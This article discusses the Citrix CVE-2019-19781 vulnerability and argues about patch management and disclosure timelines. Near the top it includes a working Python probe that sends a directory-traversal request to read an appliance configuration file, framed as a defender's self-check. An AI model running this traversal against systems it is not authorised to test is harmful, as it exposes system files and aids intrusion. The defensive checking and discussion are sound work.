What can the Citrix bug teach us about patch management and disclosure protocols?


The Citrix bug (CVE-2019-19781) was discovered in mid-December 2019 by security researchers. Although the vendor promptly released mitigation measures, the flaw gave criminals access to victims’ local networks, allowing them to run code remotely via directory traversal.
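To illustrate what directory traversal looks like in this case: public write-ups of CVE-2019-19781 described unauthenticated requests using a `/../` sequence to escape the `/vpn/` web root and read files under `/vpns/`. The sketch below, based on those public descriptions, shows how a defender might probe their own appliance; the hostname is a placeholder and the response heuristic is an assumption, not an official Citrix detection method.

```python
# Hedged sketch of the widely published check for CVE-2019-19781.
# The "/../" sequence escapes the /vpn/ web root -- classic directory
# traversal. Only run this against appliances you own or are
# authorised to test.
import urllib.request

# Traversal path reported in public write-ups of the flaw
TRAVERSAL_PATH = "/vpn/../vpns/cfg/smb.conf"

def probe_url(host: str) -> str:
    """Build the probe URL for a given appliance hostname."""
    return f"https://{host}{TRAVERSAL_PATH}"

def looks_vulnerable(status: int, body: str) -> bool:
    """Heuristic: an unpatched appliance serves the Samba config
    file with HTTP 200; its content starts with a [global] section."""
    return status == 200 and "[global]" in body

def check(host: str, timeout: float = 5.0) -> bool:
    """Probe one host; treat errors (e.g. 403 after mitigation) as safe."""
    req = urllib.request.Request(probe_url(host), method="GET")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            body = resp.read().decode("utf-8", errors="replace")
            return looks_vulnerable(resp.status, body)
    except Exception:
        return False
```

The mitigation Citrix shipped worked along the same lines: a responder policy that rejects requests containing `/vpns/` with a traversal sequence, which is why a 403 on this probe suggests the mitigation is in place.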

This vulnerability gained attention because of the severity of the exploit, but also because it provides insight into the challenges of most enterprises’ approach to patch management, as well as the problems with disclosure protocols.

When alerted to the vulnerability, Citrix developed and released a series of mitigation measures within a few weeks.

A full patch, however, was made available only towards the end of January, when many organisations had already been exposed for days, and when a proof of concept for the exploitation of the bug had already been published online.

It later emerged that in some situations the original mitigation did not actually work, giving organisations a false sense of security.

According to Bulletproof’s annual report, public-facing services are discovered and attacked within 32ms of going live, and as many as 50% of critical flaws are linked to poor patch management. Leaving such a critical and commonly found vulnerability exposed for even a few days therefore had serious consequences.

Not only was the bug linked to the NotRobin backdoor, which targets Citrix/NetScaler appliances vulnerable to CVE-2019-19781, but it also highlighted how current disclosure protocols may place unnecessary pressure on vendors to disclose flaws and release patches hastily.

Does ethical disclosure put pressure on vendors to release patches too soon?

Theoretically, disclosure timeframes and protocols are in place to ensure that vendors will develop a patch in a timely manner, and that organisations and individuals are not exposed to unnecessary risks.

This makes sense: if a vulnerability is discovered by researchers, a threat actor is likely capable of finding it, too. Forcing vendors to act swiftly should therefore shrink the window of exposure.

However, each case is very different, and pressuring vendors to release a fix is not always beneficial.

If patches are rushed, there can be mistakes in how they are developed or, more commonly, compatibility issues, which may prompt organisations to hold off applying the patch, ultimately reducing the effectiveness of such strict protocols.

Do organisations really patch when they should?

It may seem reasonable to expect that enterprises – especially after the WannaCry attack highlighted the price of leaving a vulnerability unpatched – will immediately step up and apply the fixes.

But this doesn’t happen, for a number of reasons, meaning that many systems remain unpatched long after proof-of-concept demonstrations of how to exploit a specific CVE have been made publicly available.

In fact, a quick, 10-minute scan conducted in February, well after the patch was released and the exploit became publicly available, returned 59 unpatched Citrix systems, all of which could potentially have already been compromised.

It is safe to assume that a more thorough scan would have returned many more.

Cyber security often comes second

One of the reasons why so many companies fail to apply patches when they should is the impact downtime has on business operations.

Having business critical systems taken offline for the time required for fixes to be installed can cause a revenue loss that IT security teams need to justify to the board.

But postponing the application of security patches to avoid disrupting business operations brings only a short-term advantage.

The revenue loss that may come from a security compromise will almost certainly outweigh the cost involved with protecting the business, its data and its customers from a cyberattack.

Whether it’s ransomware that halts operations altogether, or a compromise of sensitive customer information resulting in sanctions and reputational damage, prioritising security is a longer-term investment that will pay off.

Going back to basics

Organisations still fail to get the basics of security right, and the current vulnerability disclosure protocols do not account for that.

As many as 1 in 5 companies that undergo a penetration test turn out to have a critical flaw in their infrastructure or applications in need of immediate remediation, and half of those flaws are due to poor patch management.

This is partly due to the reasons outlined above, but there are many more, among them the lack of resources – human and monetary – needed to stay on top of security.

The best thing we can hope for is for organisations to learn from past mistakes and start approaching security as an integral part of their business model.

Better patch management and following best practices – essentially, thinking security and privacy by design – may seem like a monumental thing to put in place.

But when we think about security as one of our objectives, rather than something to bolt on top of operations, ultimately both the business and its customers will benefit.
